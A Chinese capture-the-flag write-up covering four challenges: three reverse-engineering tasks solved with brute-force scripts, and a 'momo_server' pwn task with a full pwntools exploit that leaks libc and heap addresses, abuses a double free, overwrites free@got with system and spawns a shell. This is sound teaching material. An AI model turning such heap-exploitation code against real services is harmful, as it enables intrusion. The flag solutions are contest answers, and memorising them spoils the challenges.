• 复现一下当时没做出来的题目

what is it

• 程序逻辑很简单，对输入的luck string md5加密后会有校验，然后会调用decode函数对check函数进行解码，才能看到check函数

• 先爆破luck string，得到luck string为ozulmt

import hashlib
import itertools

def md5_crypto(data):

    md = hashlib.md5()
    md.update(data)
    sigh = md.hexdigest()
    return sigh

charset = [chr(i) for i in range(97,123)]
inputs = itertools.product(charset,repeat=6)

for i in inputs:
    input = "".join(i)
    cipher = md5_crypto(input)

    v15 = 0
    v14 = 0
    for i in range(32):
        if cipher[i] == '0':
            v15 += 1
            v14 += i

    if (10 * v15 + v14 == 403):
        print input
        exit()

• 得到luck string，我们就可以在decode函数执行完的时候把内存dump出来，这样就可以查看check函数，这里可以参考菜鸟教你用esp定律手脱UPX壳，然后分析check函数，会先对flag格式进行检查，最后会有一个比较，直接下断点就可以看到比较的内容

• 所以flag就是那串比较的东西然后套上flag的格式

cpp

• 看起来c++很难看，其实仔细研究一下还是很简单的程序逻辑，这里operator[]就是取数组元素的操作

#程序逻辑
for i in range(len(a1)):
    v2 = 4 * a1[i]
    a[i]= ( ((a1[i]) >> 6 | v2) ^ i ) & 0xff


for i in range(4):
    for j in range(1,len(s)):
        v2 = a1[j]
        v3 = a1[j-1] | v2
        a1[j] = ( v3 & ( 0xffffffff - (a1[j] & a1[j-1]) )) & 0xff

• 然后写个脚本爆破

def crypto(i,j):

        return (((i >> 6) | (4 * i)) ^ j ) & 0xff


a = [0x99,0xb0,0x87,0x9e,0x70,0xe8,0x41,0x44,0x05,0x04,0x8b,0x9a,0x74,0xbc,0x55,0x58,0xb5,0x61,0x8e,0x36,0xac,0x09,0x59,0xe5,0x61,0xdd,0x3e,0x3f,0xb9,0x15,0xed,0xd5]

flag = 'f'

num = 1
while num < len(a):

    for i in range(0x20,0x7f):

        c = []

        for j in range(len(flag)):
            c.append(crypto(ord(flag[j]),j))
        c.append(crypto(i,num)) 



        for l in range(4):
            for m in range(1,len(c)):

                v3 = c[m-1] | c[m]
                v1 = ( v3 & ( 0xffffffff - (c[m] & c[m-1]) )) & 0xff
                c[m] = v1

        if c[num] == a[num]:

            print chr(i)
            flag += chr(i)
            num += 1
            break

print flag

cyvm

• 一道入门级的vm逆向，主要用循环来表示程序逻辑

• 一个一个手动跟了一下发现是个蛮简单的循环逻辑

0F 10 14 20 10 16 00 09  24 02 15 16 E9 12 16 E8
02 17 16 13 16 90 06 15  17 45 06 15 16 76 01 15
16 12 16 FF 0A 14 16 0C  09 0E ?? ?? ?? ?? ?? ??

0f scanf
09 jmp
0c cmp

scanf('%s',s)

*(&v7 + *(v5 + 1 + a1) -20) = *(v5 + 2 + a1)

v7[0] = 0x20
i = 0x00
v5 = 0x24

if 0x20 != i:
    v5 = 0x9
else:
    v5 += 2

a = s[i]

b = s[i+1]

a ^= b
a ^= i
s[i] = a

++i

if 0x20 != i:
    v5 = 0x9
else:
    v5 += 2

• 所以程序逻辑可表示如下：

for i in range(len(s)):
    a = s[i]
    b = s[i+1]
    a ^= b
    a ^= i
    s[i] = a

• 写个脚本爆破出flag

flag = 'f'

s2 = [0x0a, 0x0c, 0x04, 0x1f, 0x48, 0x5a, 0x5f, 0x03, 0x62, 0x67, 0x0e, 0x61, 0x1e, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7c, 0x39, 0x54, 0x4b, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0e, 0x62]

while True:

    if len(flag) >= 0x20:
            break
            
    for i in range(0x20,0x7f):
        j = len(flag)
        a = ord(flag[j-1])
        b = i
        a ^= b
        a ^= (j-1)
        if a == s2[j-1]:
            flag += chr(i)
            break

        

print flag

momo_server

• 考验选手逆向和对http协议的了解，漏洞就是一个double free，改
  free@got为system地址，wp已经有人写的比较详细了，就不再重复了。(该程序由于用sscanf传参所以如果memo=后的内容有00字符串则会崩溃)

exp:

from pwn import *
from urllib import quote

#context.log_level ='debug'

def http(method,operating,content):
    payload = method
    payload += ' ' + operating + ' Connection: keep-alive'
    payload += '\n\n' + content
    return payload

def get_list():
    payload = http('GET','/list','')
    p.send(payload)

def add(memo,count):
    content = 'memo={}&count={}'.format(memo,count)
    payload = http('POST','/add',content)
    p.send(payload)

def count():
    payload = http('POST','/count','')
    p.send(payload)

def echo(con):
    content = 'content={}'.format(con)
    payload = http('POST','/echo',content)
    p.send(payload)

while True:
    try:
        p = process('./pwn')
        libc = ELF('./libc-so.6')

        #leak libc
        echo('0'*0x34 + 'aaaa')
        p.recvuntil('aaaa')
        libc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x5f0e14
        assert libc_base & 0xff == 0
        log.success('libc base addr : 0x%x'%libc_base)
        system_addr = libc_base + libc.symbols['system']
        log.success('system addr : 0x%x'%system_addr)


        add('a'*0x60,'1')
        add('b'*0x60,'2')
        add('c'*0x60,'3')
        add('d'*0x60,'4')
        add('e'*0x60,'200')


        #leak heap_base
        count()
        sleep(4)
        get_list()
        p.recvuntil('0</td></tr><tr><td>')
        heap_base = u64(p.recvuntil('\x3c',drop = True).ljust(8,'\x00')) -0x20 
        log.success('heap_base addr : 0x%x'%heap_base)

        #double free
        add(p64(heap_base+0xa0).replace('\0', ''),'1')  # 0 -> 1 -> 0
        sleep(3)
        
        #hijack fd -> 0x602ffa
        add(quote(p64(0x602ffa).ljust(0x60,'a')),'200') # 1 -> 0 -> 0x602ffa
        sleep(1)

        add(quote('bbbbbbbbb'.ljust(0x60,'a')),'200') # 0 -> 0x602ffa
        sleep(1)

        #cat flag
        add(quote('cat flag\x00'.ljust(0x60,'a')),'3')
        sleep(1)
        #gdb.attach(p,'b *0x401482')
        #hijack got@free -> system and trigger system('cat flag')
        add(quote(('a'*14 + p64(system_addr)).ljust(0x60,'a')),'200')

        p.interactive()

    except Exception as e:
        p.close()

参考文章：

• https://bbs.ichunqiu.com/thread-47645-1-1.html
• https://xz.aliyun.com/t/3269